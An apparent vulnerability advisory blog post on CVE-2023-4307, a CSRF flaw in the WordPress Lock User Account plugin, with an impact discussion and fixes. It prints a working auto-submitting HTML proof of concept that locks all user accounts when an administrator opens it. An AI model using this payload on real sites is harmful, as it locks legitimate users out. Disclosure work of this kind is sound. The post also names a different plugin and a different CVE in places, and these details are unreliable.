In the pursuit of robust website security, a profound vulnerability has emerged during the assessment of WordPress plugins. A striking vulnerability within the Lock User Account plugin was discovered, heralding a serious threat. This vulnerability exposes an avenue for malicious attackers to enact an untraceable lockout of all user accounts, capitalizing on a Cross-Site Request Forgery (CSRF) vulnerability.
Main info:
| CVE | CVE-2023-4307 |
| Plugin | Lock User Account |
| Critical | High |
| Publicly Published | August 21, 2023 |
| Last Updated | August 21, 2023 |
| Researcher | Dmtirii Ignatyev |
| OWASP TOP-10 | A2: Broken Authentication and Session Management |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4307 https://wpscan.com/vulnerability/06f7aa45-b5d0-4afb-95cc-8f1c82f6f8b3 |
| Plugin Security Certification by CleanTalk |  |
Timeline
| August 4, 2023 | Plugin testing and vulnerability detection in the Advanced File Manager plugin have been completed |
| August 4, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| August 12, 2023 | The author has removed his plugin from WordPress library |
| August 22, 2023 | Registered CVE-2023-4307 |
Discovery of the Vulnerability
In the process of testing the plugin, which makes it possible to block the account of any user, a CSRF vulnerability was found, which allows the administrator to block all accounts when clicking on a malicious link. At the same time, the administrator will not know about it. There is no _wpnonce check in the plugin
Understanding of CSRF attack’s
Cybercriminals can craft a malicious link that, when clicked by an unwitting administrator, invokes unauthorized actions within the Lock User Account plugin. The impact is astounding – the attacker can swiftly lock all user accounts without the administrator’s knowledge. The lack of an essential _wpnonce check in the plugin facilitates this alarming exploit. CSRF – OWASP TOP-10
Exploiting the CSRF vulnerability
Administrators unknowingly executing the malicious link could inadvertently freeze every WordPress user’s account. The implications are severe, rendering the website inaccessible to users and disrupting the digital ecosystem.
POC html code:
<html>
<body>
<script>history.pushState(”, ”, ‘/’)</script>
<form action=”http://your_site/wordpress/wp-admin/users.php”>
<input type=”hidden” name=”s” value=”” />
<input type=”hidden” name=”action” value=”lock” />
<input type=”hidden” name=”new_role” value=”” />
<input type=”hidden” name=”paged” value=”1″ />
<input type=”hidden” name=”users[0]” value=”1″ />
<input type=”hidden” name=”users[1]” value=”2″ />
<input type=”hidden” name=”users[2]” value=”3″ />
<input type=”hidden” name=”users[3]” value=”4″ />
<input type=”hidden” name=”action2″ value=”lock” />
<input type=”hidden” name=”new_role2″ value=”” />
<input type=”submit” value=”Submit request” />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
P.s. YOU CAN ADD ANY OTHER INPUT DATA WITH THE NAME=”USERS” AND THE VALUE=”YOUR_MAX_USERS_NUMBER”
Potential Risks and Real-World Impact
The CSRF vulnerability within the Lock User Account plugin introduces grave risks and potential scenarios:
- Unauthorized Account Blocking:
An attacker could craft a malicious link and trick the administrator into clicking on it unknowingly. This would lead to the administrator unintentionally blocking all user accounts on the website. - Mass Account Disruption:
As all user accounts get blocked, it could lead to a mass disruption of user access to the website. This might cause significant inconvenience to users and damage the reputation of the website. - Denial of Service (DoS):
By blocking all accounts, the website may effectively experience a DoS situation, preventing legitimate users from accessing their accounts and using the website’s services.
Recommendations for Improved Security
Safeguard your WordPress environment against CVE-2023-4019 and fortify your digital stronghold:
- Delete plugin:
Since the plugin has been removed from the wordpress library, it is necessary to remove it. Current version will be vulnerable to this attack - Implement _wpnonce Verification::
Enhance the plugin’s defenses by incorporating robust _wpnonce verification. This step acts as a formidable barrier against CSRF attacks, thwarting unauthorized actions. - Regular Security Audits:
Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively. - Educate Administrators:
Educate administrators about the nature of CSRF attacks and the importance of cautious clicking. Raising awareness among your team can prevent inadvertent actions that could compromise site security.
By disseminating this crucial information throughout the WordPress community, we can collectively bolster the security of countless websites. Share this knowledge to ensure that administrators are well-equipped to defend against the CVE-2023-4307 vulnerability and to maintain the safety of their WordPress sites.
#WordPressSecurity #CSRFVulnerability #WebsiteProtection #StayInformed
Use CleanTalk solutions to improve the security of your website
Dmitrii i.
If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.
Related posts
CVE-2023-4798 – User Avatar – Reloaded < 1.2.2 - Contributor+ Stored XSS
CVE-2023-3601 – Simple Author Box < 2.52 - Contributor+ Arbitrary User Information Disclosure via IDOR (Thief of Creds)
CVE-2023-4827 – File Manager Pro < 1.8 - Remote Code Execution via CSRF
How to reduce a possibility of brute force attacks on WordPress
Leave a Reply